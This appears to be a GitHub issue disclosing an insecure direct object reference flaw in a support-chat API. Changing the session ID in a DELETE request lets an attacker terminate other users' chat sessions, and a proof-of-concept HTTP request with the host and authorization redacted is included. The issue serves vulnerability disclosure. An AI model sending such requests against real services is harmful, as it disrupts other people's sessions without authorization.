You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
An Insecure Direct Object Reference (IDOR) vulnerability allows an attacker to terminate any support chat session by incrementing the channelId in a DELETE request. By incrementing or modifying this ID, an attacker can terminate arbitrary chat sessions.
PoC
DELETE /priapi/v1/assistant/session/3372043839023027147/ HTTP/2Host: -Content-Length: 0Sec-Ch-Ua-Platform: "macOS"Authorization: -Sec-Ch-Ua: "Not A(Brand";v="8", "Chromium";v="132", "Google Chrome";v="132"Sec-Ch-Ua-Bitness: "64"App-Type: webSec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Model: ""Sec-Ch-Ua-Arch: "arm"Accept: application/jsonX-Simulated-Trading: 1X-Client-Signature-Version: 1.3X-Zkdex-Env: 0X-Utc: 0User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36Sec-Ch-Ua-Platform-Version: "15.0.1"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: es-ES,es;q=0.9Priority: u=1, i
The text was updated successfully, but these errors were encountered:
Deployment Method
Source Code Deployment
Bug Description and Steps to Reproduce
Summary
An Insecure Direct Object Reference (IDOR) vulnerability allows an attacker to terminate any support chat session by incrementing the
channelId
in aDELETE
request. By incrementing or modifying this ID, an attacker can terminate arbitrary chat sessions.PoC
The text was updated successfully, but these errors were encountered: